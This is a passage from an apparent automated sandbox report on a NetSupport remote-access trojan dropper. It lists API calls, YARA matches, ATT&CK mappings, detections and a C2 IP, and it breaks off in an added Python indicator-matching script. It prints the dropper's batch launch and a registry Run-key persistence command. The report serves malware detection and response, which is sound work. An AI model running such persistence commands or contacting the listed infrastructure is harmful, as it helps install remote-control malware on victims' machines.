Source: HTCTL32.DLL.0.dr | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.0.dr | Binary or memory string: VMWare
Source: bild.exe, 00000009.00000003.1904526091.00000000011B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bild.exe, 00000005.00000003.1825934051.0000000000A52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-22450)
Source: C:\Users\Public\Public\Videos\Video\bild.exe | API call chain: ExitProcess graph end node (graph_4-57386)
Source: C:\Users\Public\Public\Videos\Video\bild.exe | API call chain: ExitProcess graph end node
Source: C:\Users\Public\Public\Videos\Video\bild.exe | API call chain: ExitProcess graph end node
Source: C:\Users\Public\Public\Videos\Video\bild.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00174A5A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00178AAA GetProcessHeap
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00175B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016DBC3 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exe
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid
Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | Binary or memory string: Shell_TrayWnd
Source: bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | Binary or memory string: Progman
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016D8CB cpuid
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016932F GetLocaleInfoW,GetNumberFormatW
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11173A35 __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11173D69 __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11173CC6 _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1116B38E GetLocaleInfoA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11173933 __getptd,_LcidFromHexString,GetLocaleInfoA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111739DA GetLocaleInfoW,_GetPrimaryLen,_strlen
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1117383E GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11173D2D _strlen,_GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11173C06 __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11173D69 __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1116B38E GetLocaleInfoA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11173933 __getptd,_LcidFromHexString,GetLocaleInfoA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111739DA GetLocaleInfoW,_GetPrimaryLen,_strlen
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1117383E GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11173A35 __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11173D2D _strlen,_GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11173C06 __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11173CC6 _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015A8E0 GetVersionExW
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError
Source: Yara match | File source: 5.2.bild.exe.6d0b0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.6d0b0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.6d0b0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.6e510000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.6e510000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.6e510000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.2e94800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.6c760000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1826096354.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4158412935.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.1903730466.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.1717304165.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7552, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7720, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7988, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\bild.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; a count in parentheses is the number of report signatures mapped to that technique, techniques without a count were not matched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Windows Management Instrumentation (1); Native API (4); Command and Scripting Interpreter (2); Service Execution (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scripting (1); DLL Side-Loading (1); Valid Accounts (2); Windows Service (1); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Windows Service (1); Process Injection (13); Registry Run Keys / Startup Folder (1); Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (2); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Modify Registry (1); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (13)
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (44); Security Software Discovery (141); Virtualization/Sandbox Evasion (2); Process Discovery (1); Application Window Discovery (11); System Owner/User Discovery (1); Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Screen Capture (1); Input Capture (1); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (22); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID 1556890; sample file.exe; start date 16/11/2024; architecture WINDOWS; score 88). Node numbers are the graph's own; the counts after a process name are the legend's created-files / created-registry-values counters.

Start node (2)
  signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures
  DNS: geo.netsupportsoftware.com
  started: file.exe (node 8, count 19); bild.exe (node 11); bild.exe (node 13)

file.exe (node 8)
  dropped: C:\Users\Public\Public\...\remcmdstub.exe (PE32); C:\Users\Public\Public\Videos\...\pcicapi.dll (PE32); C:\Users\Public\Public\Videos\...\bild.exe (PE32); 6 other files (3 malicious)
  started: cmd.exe (node 15, count 1)

cmd.exe (node 15)
  started: bild.exe (node 17, count 17); conhost.exe (node 21); reg.exe (node 23, counts 1 1)

bild.exe (node 17)
  network: 45.61.128.74 port 443 (local port 49730), M247GB, United States; geo.netsupportsoftware.com 104.26.0.231 port 80 (local port 49731), CLOUDFLARENETUS, United States
  signatures: Multi AV Scanner detection for dropped file; Contains functionality to change the wallpaper; Delayed program exit found

Antivirus detection: submitted file
Source | Detection | Scanner | Label
file.exe | 50% | ReversingLabs | Win32.Trojan.NetSupport
file.exe | 51% | Virustotal |

Antivirus detection: dropped files
Source | Detection | Scanner | Label
C:\Users\Public\Public\Videos\Video\HTCTL32.DLL | 3% | ReversingLabs |
C:\Users\Public\Public\Videos\Video\HTCTL32.DLL | 3% | Virustotal |
C:\Users\Public\Public\Videos\Video\PCICHEK.DLL | 3% | ReversingLabs |
C:\Users\Public\Public\Videos\Video\PCICHEK.DLL | 1% | Virustotal |
C:\Users\Public\Public\Videos\Video\PCICL32.DLL | 12% | ReversingLabs |
C:\Users\Public\Public\Videos\Video\PCICL32.DLL | 17% | Virustotal |
C:\Users\Public\Public\Videos\Video\TCCTL32.DLL | 3% | ReversingLabs |
C:\Users\Public\Public\Videos\Video\TCCTL32.DLL | 3% | Virustotal |
C:\Users\Public\Public\Videos\Video\bild.exe | 29% | ReversingLabs | Win32.Trojan.NetSupport
C:\Users\Public\Public\Videos\Video\bild.exe | 49% | Virustotal |
C:\Users\Public\Public\Videos\Video\msvcr100.dll | 0% | ReversingLabs |
C:\Users\Public\Public\Videos\Video\pcicapi.dll | 3% | ReversingLabs |
C:\Users\Public\Public\Videos\Video\remcmdstub.exe | 13% | ReversingLabs |

No Antivirus matches (two further scan tables, both empty)

Antivirus detection: URLs
Source | Detection | Scanner | Label
http://45.61.128.74/fakeurl.htm | 0% | Avira URL Cloud | safe

Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 104.26.0.231 | true | false | | high

URLs contacted
Name | Malicious | Antivirus Detection | Reputation
http://45.61.128.74/fakeurl.htm | true | Avira URL Cloud: safe | unknown
http://geo.netsupportsoftware.com/location/loca.asp | false | | high
URL strings found in memory dumps and dropped files
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.pci.co.uk/support | file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://%s/testpage.htmwininet.dll | bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
http://geo.netsupportsoftware.com/location/loca.aspD | bild.exe, 00000004.00000002.4158412935.0000000000A65000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.pci.co.uk/supportsupport | file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.symauth.com/rpa00 | file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | false | | high
http://127.0.0.1RESUMEPRINTING | file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://%s/testpage.htm | bild.exe, bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
http://www.netsupportschool.com/tutor-assistant.asp11( | file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://127.0.0.1 | bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.symauth.com/cps0( | file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | false | | high
http://www.netsupportschool.com/tutor-assistant.asp | file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://%s/fakeurl.htm | bild.exe, bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
45.61.128.74 | unknown | United States | 9009 | M247GB | true
104.26.0.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
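The network tables above give a responder three things to look for in proxy logs: the gateway IP 45.61.128.74 (reached on port 443), the /fakeurl.htm and /testpage.htm request paths that HTCTL32.DLL builds from the "http://%s/..." format strings listed among the memory-dump URLs, and the geo.netsupportsoftware.com/location/loca.asp lookup. Two caveats matter when using them: Avira URL Cloud rates http://45.61.128.74/fakeurl.htm as "safe" while the sandbox marks it malicious, so a reputation verdict alone should not clear the IP, and the geo lookup goes to NetSupport's own domain (reputation "high" in the table), so it shows a NetSupport client is present but is not on its own evidence of abuse. The Python below is an added example and is not part of the Joe Sandbox report; the log line format, the client addresses and the 203.0.113.9 host are constructed for the demonstration.

```python
"""Added example (not from the Joe Sandbox report): apply the report's network
indicators to proxy log lines.  Indicator values come from the tables above;
the log format, client addresses and the 203.0.113.9 host are constructed."""
import ipaddress
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Indicators taken from the report: gateway IP, geo-check host/path, and the
# request paths HTCTL32.DLL builds from "http://%s/fakeurl.htm" / "http://%s/testpage.htm".
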